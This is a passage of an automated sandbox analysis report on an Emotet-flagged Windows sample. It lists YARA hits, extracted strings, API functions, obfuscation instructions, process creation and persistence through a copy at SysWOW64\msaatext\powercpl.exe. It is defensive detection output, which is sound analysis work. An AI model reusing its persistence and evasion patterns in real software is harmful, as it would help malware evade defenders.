Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000003.308587264.0000019981840000.00000004.00000001.sdmp String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000C.00000003.308496354.000001998185A000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308896949.000001998185D000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000002.308889599.000001998184E000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000C.00000003.308478355.0000019981861000.00000004.00000001.sdmp String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
Source: svchost.exe, 0000000C.00000002.308838059.0000019981813000.00000004.00000001.sdmp, svchost.exe, 0000000C.00000002.308874759.000001998183D000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308564247.0000019981845000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000C.00000003.308564247.0000019981845000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
Source: svchost.exe, 0000000C.00000003.286727497.0000019981832000.00000004.00000001.sdmp String found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
Source: svchost.exe, 0000000C.00000002.308889599.000001998184E000.00000004.00000001.sdmp String found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a DirectInput object (often for capturing keystrokes)
Source: lHuFdWpoMA.exe, 00000000.00000002.220395314.0000000000EAA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: lHuFdWpoMA.exe, 00000000.00000002.220395314.0000000000EAA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Yara detected Emotet
Source: Yara match File source: 00000003.00000002.482882849.0000000000FB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482751188.0000000000F74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220540137.0000000002A10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.482632902.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220611938.0000000002BB1000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.220584249.0000000002B74000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 3.2.powercpl.exe.fb0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.lHuFdWpoMA.exe.2bb0000.1.unpack, type: UNPACKEDPE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey, 3_2_00FB2680
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB2680 CryptCreateHash,CryptAcquireContextW,RtlAllocateHeap,CryptImportKey,LocalFree,CryptDecodeObjectEx,CryptGenKey, 3_2_00FB2680

System Summary:

barindex
Creates files inside the system directory
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File created: C:\Windows\SysWOW64\msaatext\ Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File created: C:\Windows\SysWOW64\msaatext\ Jump to behavior
Deletes files inside the Windows folder
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File deleted: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File deleted: C:\Windows\SysWOW64\msaatext\powercpl.exe:Zone.Identifier Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB86F0 0_2_02BB86F0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB8330 0_2_02BB8330
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB41B7 0_2_02BB41B7
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3CE0 0_2_02BB3CE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3EE0 0_2_02BB3EE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB42C9 0_2_02BB42C9
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB7B30 0_2_02BB7B30
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6860 0_2_02BB6860
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1A28E 0_2_02A1A28E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A196CE 0_2_02A196CE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A19ECE 0_2_02A19ECE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15E67 0_2_02A15E67
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A27669 0_2_02A27669
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15A7E 0_2_02A15A7E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A183FE 0_2_02A183FE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1587E 0_2_02A1587E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D55 0_2_02A15D55
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB86F0 0_2_02BB86F0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB8330 0_2_02BB8330
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB41B7 0_2_02BB41B7
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB4190 0_2_02BB4190
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3CE0 0_2_02BB3CE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB3EE0 0_2_02BB3EE0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB42C9 0_2_02BB42C9
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB7B30 0_2_02BB7B30
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6860 0_2_02BB6860
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1A28E 0_2_02A1A28E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A196CE 0_2_02A196CE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A19ECE 0_2_02A19ECE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15E67 0_2_02A15E67
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A27669 0_2_02A27669
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15A7E 0_2_02A15A7E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A183FE 0_2_02A183FE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A1587E 0_2_02A1587E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D2E 0_2_02A15D2E
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A15D55 0_2_02A15D55
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB86F0 3_2_00FB86F0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3CE0 3_2_00FB3CE0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB3EE0 3_2_00FB3EE0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB42C9 3_2_00FB42C9
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB41B7 3_2_00FB41B7
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4190 3_2_00FB4190
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB6860 3_2_00FB6860
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB8330 3_2_00FB8330
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB7B30 3_2_00FB7B30
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0587E 3_2_00E0587E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D55 3_2_00E05D55
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05D2E 3_2_00E05D2E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E096CE 3_2_00E096CE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E09ECE 3_2_00E09ECE
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E0A28E 3_2_00E0A28E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05E67 3_2_00E05E67
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E17669 3_2_00E17669
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E05A7E 3_2_00E05A7E
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00E083FE 3_2_00E083FE
Sample file is different than original file name gathered from version info
Source: lHuFdWpoMA.exe, 00000000.00000002.221175912.00000000030E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: originalfilename vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221175912.00000000030E0000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: originalfilename vs lHuFdWpoMA.exe
Source: lHuFdWpoMA.exe, 00000000.00000002.221230123.0000000003140000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs lHuFdWpoMA.exe
Tries to load missing DLLs
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xboxlivetitleid.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cdpsgshims.dll Jump to behavior
Source: classification engine Classification label: mal80.troj.evad.winEXE@18/8@0/7
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle, 0_2_02BB8CA0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: CreateServiceW,CloseServiceHandle,_snwprintf,HeapFree,OpenSCManagerW,CloseServiceHandle, 0_2_02BB8CA0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification, 3_2_00FB4FD0
Source: C:\Windows\SysWOW64\msaatext\powercpl.exe Code function: 3_2_00FB4FD0 Process32NextW,Process32FirstW,Process32FirstW,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,FindCloseChangeNotification, 3_2_00FB4FD0
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5390 ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB5390 ChangeServiceConfig2W,RtlAllocateHeap,RtlAllocateHeap,QueryServiceConfig2W,CloseServiceHandle,EnumServicesStatusExW,GetTickCount,RtlAllocateHeap,RtlAllocateHeap,HeapFree,RtlFreeHeap, 0_2_02BB5390
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Jump to behavior
Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1528:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:1528:120:WilError_01
Source: lHuFdWpoMA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: lHuFdWpoMA.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: lHuFdWpoMA.exe Metadefender: Detection: 48%
Source: lHuFdWpoMA.exe ReversingLabs: Detection: 72%
Source: lHuFdWpoMA.exe Metadefender: Detection: 48%
Source: lHuFdWpoMA.exe ReversingLabs: Detection: 72%
Source: unknown Process created: C:\Users\user\Desktop\lHuFdWpoMA.exe 'C:\Users\user\Desktop\lHuFdWpoMA.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\lHuFdWpoMA.exe 'C:\Users\user\Desktop\lHuFdWpoMA.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -p -s NgcSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s NgcCtnrSvc
Source: unknown Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Process created: C:\Windows\SysWOW64\msaatext\powercpl.exe C:\Windows\SysWOW64\msaatext\powercpl.exe Jump to behavior
Source: C:\Windows\System32\svchost.exe Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02B71030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError, 0_2_02B71030
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61B0 push ecx; mov dword ptr [esp], 000003A6h 0_2_02BB61B1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62A0 push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02BB62A1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6090 push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02BB6091
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6180 push ecx; mov dword ptr [esp], 0000D106h 0_2_02BB6181
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB60F0 push ecx; mov dword ptr [esp], 0000A172h 0_2_02BB60F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62D0 push ecx; mov dword ptr [esp], 00001969h 0_2_02BB62D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61D0 push ecx; mov dword ptr [esp], 00004B56h 0_2_02BB61D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6320 push ecx; mov dword ptr [esp], 00009128h 0_2_02BB6321
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6220 push ecx; mov dword ptr [esp], 00004B50h 0_2_02BB6221
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6240 push ecx; mov dword ptr [esp], 00008F23h 0_2_02BB6241
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6140 push ecx; mov dword ptr [esp], 00004AF2h 0_2_02BB6141
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h 0_2_02A17EBF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02A17E3F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h 0_2_02A17E6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A28B8F push edi; iretd 0_2_02A28BA1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A33FD9 push ss; iretd 0_2_02A33FDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h 0_2_02A17C8F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push ebx; iretd 0_2_02A344AF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push FFFFFF95h; iretd 0_2_02A344F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h 0_2_02A17CDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02A17C2F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h 0_2_02A17DBF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DDE push ecx; mov dword ptr [esp], 00008F23h 0_2_02A17DDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D1E push ecx; mov dword ptr [esp], 0000D106h 0_2_02A17D1F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D6E push ecx; mov dword ptr [esp], 00004B56h 0_2_02A17D6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17D4E push ecx; mov dword ptr [esp], 000003A6h 0_2_02A17D4F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61B0 push ecx; mov dword ptr [esp], 000003A6h 0_2_02BB61B1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62A0 push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02BB62A1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6090 push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02BB6091
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6180 push ecx; mov dword ptr [esp], 0000D106h 0_2_02BB6181
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB60F0 push ecx; mov dword ptr [esp], 0000A172h 0_2_02BB60F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB62D0 push ecx; mov dword ptr [esp], 00001969h 0_2_02BB62D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB61D0 push ecx; mov dword ptr [esp], 00004B56h 0_2_02BB61D1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6320 push ecx; mov dword ptr [esp], 00009128h 0_2_02BB6321
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6220 push ecx; mov dword ptr [esp], 00004B50h 0_2_02BB6221
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6240 push ecx; mov dword ptr [esp], 00008F23h 0_2_02BB6241
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02BB6140 push ecx; mov dword ptr [esp], 00004AF2h 0_2_02BB6141
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17EBE push ecx; mov dword ptr [esp], 00009128h 0_2_02A17EBF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E3E push ecx; mov dword ptr [esp], 0000BFAAh 0_2_02A17E3F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17E6E push ecx; mov dword ptr [esp], 00001969h 0_2_02A17E6F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A28B8F push edi; iretd 0_2_02A28BA1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A33FD9 push ss; iretd 0_2_02A33FDE
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C8E push ecx; mov dword ptr [esp], 0000A172h 0_2_02A17C8F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push ebx; iretd 0_2_02A344AF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A3449C push FFFFFF95h; iretd 0_2_02A344F1
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17CDE push ecx; mov dword ptr [esp], 00004AF2h 0_2_02A17CDF
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17C2E push ecx; mov dword ptr [esp], 0000BAD9h 0_2_02A17C2F
Source: C:\Users\user\Desktop\lHuFdWpoMA.exe Code function: 0_2_02A17DBE push ecx; mov dword ptr [esp], 00004B50h 0_2_02A17DBF
